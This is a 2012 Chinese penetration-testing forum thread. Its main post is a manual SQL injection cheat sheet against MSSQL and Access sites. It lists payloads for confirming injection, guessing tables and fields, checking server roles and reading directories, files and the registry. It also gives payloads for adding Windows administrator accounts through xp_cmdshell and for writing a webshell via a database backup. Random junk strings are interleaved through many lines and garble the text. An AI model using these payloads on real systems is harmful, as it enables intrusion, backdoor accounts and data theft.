找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 手工脚本注入
返回列表 发新帖
查看: 2609|回复: 1
打印 上一主题 下一主题

手工脚本注入

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:48:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
手工脚本注入
4 W- B6 M: o4 H1.判断是否有注入;and 1=1 ;and 1=2
5 E) O4 e& W) Y  [
2 |! @5 V5 s8 W6 Q2.初步判断是否是mssql ;and user>0 ) e2 E, k, U$ {. t6 ^
- b# E4 D. T2 |. R
3.注入参数是字符'and [查询条件] and ''='
; i# n; I' K# f% n7 ?5 o
9 W$ M. C( \. f- v$ l4.搜索时没过滤参数的'and [查询条件] and '%25'='
" r& }  a6 N# A* B
0 G7 D# O; v/ k5.判断数据库系统
/ e: K+ f$ L2 D: F3 |;and (select count(*) from sysobjects)>0 mssql ! v+ T/ Z  M  t* X" W. J5 E
;and (select count(*) from msysobjects)>0 access
; @. U& Y+ ~9 `  `% v% n6 g$ g3 d, s; X) E. Q5 r4 e0 O
6.猜数据库 ;and (select Count(*) from [数据库名])>0
4 y. Y; y5 ?0 W
8 H1 X1 S% b- q& U3 E) v7.猜字段 ;and (select Count(字段名) from 数据库名)>0
( U4 k: w3 {% F8 l4 U1 F0 ]
2 Q/ G5 l" H0 ?: n& H/ g8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
% H# y* F- m4 a
& Z' T: U' J' h$ }7 Z4 p7 i+ U9.(1)猜字段的ascii值(access) 0 S/ b6 c8 s' W4 r; i. B+ X. {6 I# I
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
% M# t/ H' n  b% y* \* Y( I$ y
5 S/ S4 p2 w9 z7 }(2)猜字段的ascii值(mssql)
8 v2 G. @* A5 Y- d5 ];and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ; n; H+ G  l, I. d4 ^4 S6 C

7 a5 k5 o! G: }! a* q( q10.测试权限结构(mssql) ( Q  O1 A0 g% a8 w
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
) c: D5 k1 N6 |9 F& q9 _" }: A" b/ q;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- % N/ `! S" }/ [- i) I/ \
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
- g/ P4 D0 Z" Q3 O;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5 |: @* V; k* @# S- f; y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0 _" }6 u$ ^+ y4 g
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
# p4 ?) q, w1 r;and 1=(select IS_MEMBER('db_owner'));-- " h5 B9 ~  k) W

2 s' \  f6 v/ N' K0 z7 Z5 t11.添加mssql和系统的帐户
3 i  c0 R  l1 L;exec master.dbo.sp_addlogin username;-- $ p$ v6 ?2 }: K( f4 m* O
- Y5 E4 V8 ^) C( J4 A
;exec master.dbo.sp_password null,username,password;-- 8 Z2 l) f. A1 O" ]$ i4 U

4 j6 x' \/ @  p, q+ k1 s;exec master.dbo.sp_addsrvrolemember sysadmin username;--
% W* Q7 q/ o0 i/ t; a+ |) H% \( x; z0 `
;exec master.dbo.xp_cmdshell 'net user username password
8 C5 \$ u1 N" m( |: o/ j/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
( ^+ U' _7 s) k
6 I/ Y- b& L8 z;exec master.dbo.xp_cmdshell 'net user username password /add';-- ( {# b+ {, W" C, l. ?

+ @7 O. q& {! q8 l;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
4 C0 o' Q% j/ b1 Q# c
: j1 \' i; V+ }4 a. w12.(1)遍历目录 ; g* K, {0 o* A4 G7 @+ T
: Z: T( w$ o6 y
;create table dirs(paths varchar(100), id int)
9 e( a/ @- H% \9 I4 L;insert dirs exec master.dbo.xp_dirtree 'c:\'
, M5 r6 O" X9 V0 m) T% D$ v$ i;and (select top 1 paths from dirs)>0 2 }# k4 X" a* U& ^6 U% v
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
9 g- o4 d" r8 P4 N) @$ [' @( V4 M" C4 k
(2)遍历目录 $ W( I- H6 A9 w) |3 U
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- # U) c' @9 r* I. R7 z
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
/ v. r$ r% g1 n0 d, H* d& i. Q;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
! l7 [+ _1 W; i. z" ?& z0 k4 J8 l;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9 H+ }9 x+ @- [  j( x; M
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 , \1 k  }* ^9 r' K
; q& P2 m! X- v/ ^3 B' i! {
13.mssql中的存储过程
2 F; s" w  `: E0 O: f6 \
& ]* Q% P: ~+ z0 R6 E% |0 Fxp_regenumvalues 注册表根键, 子键
) a- n- C+ E) e;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
5 r+ M4 y, V+ \" j/ t( t. |$ \: h0 z6 f8 ^+ m
xp_regread 根键,子键,键值名 / {: S+ g" Q, M" C; ?. A
;exec xp_regread
2 T/ o7 \$ _% ^1 \' B, j; ?# j'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 & d4 ^3 I4 |7 e
7 G' V! L! {& f# {- n$ }( h/ O/ g
xp_regwrite 根键,子键, 值名, 值类型, 值
. w% ~& R9 e; F) b2 ?1 p值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 5 s/ u6 O7 S: z$ f
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1 G/ G. R7 u* G* Z& v4 ^$ b8 m

# ~% p# b) e8 O+ v/ H) Qxp_regdeletevalue 根键,子键,值名
# l! y) M$ z! m% Y) p# G. P' q) V" Y2 U
6 j# F. C4 g6 M' h8 A3 W6 Pexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 + I3 s! t* l0 y) f$ W
8 O& i1 I# h. t( o
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
$ D, R( L3 S) O6 D$ o  m) `- \0 q0 z3 d' d  J4 l% I2 a) D7 a& W! s
14.mssql的backup创建webshell
- [. w" x# X0 A. Vuse model * V. `5 ]4 R% i7 W3 z
create table cmd(str image);
: a+ s' c3 Y/ {4 vinsert into cmd(str) values ('');
, m  s2 {* }0 u0 H8 `backup database model to disk='c:\l.asp'; 5 d8 H5 P# L7 V: L, K. C
: t) p8 e0 ~+ V* m& s1 \# E
15.mssql内置函数
3 r2 J/ p" G! \# h;and (select @@version)>0 获得Windows的版本号 ' T6 ]+ X; h+ r& k1 O
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
7 J9 h: |- G- D( P9 K+ ^+ g;and (select user_name())>0 爆当前系统的连接用户 % b; T+ q3 z8 f8 T% i
;and (select db_name())>0 得到当前连接的数据库
, z; E* j1 t( O
  i( Y( w6 a( B0 Y1 ^16.简洁的webshell , q, g  l1 ~# t/ x
$ x- p" k* W6 Q
use model
: f( o, r* V9 ?& D( `! |
5 j3 A$ r- K. {create table cmd(str image);
; d/ V/ I6 ^. E2 ~+ |- |9 L
1 J2 [: E0 \4 [& E; [# binsert into cmd(str) values ('');
: u2 M' l4 J  |0 s
0 m/ O$ p: @1 c# j1 f* pbackup database model to disk='g:\wwwtest\l.asp'; " X6 s# g1 h& t9 u

; Q  T7 \% f/ W) I; P$ t8 l
回复

使用道具 举报

老男孩
沙发
发表于 2012-9-15 16:34:20 | 只看该作者
现在很多防注入啊,有其他注入字符码
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表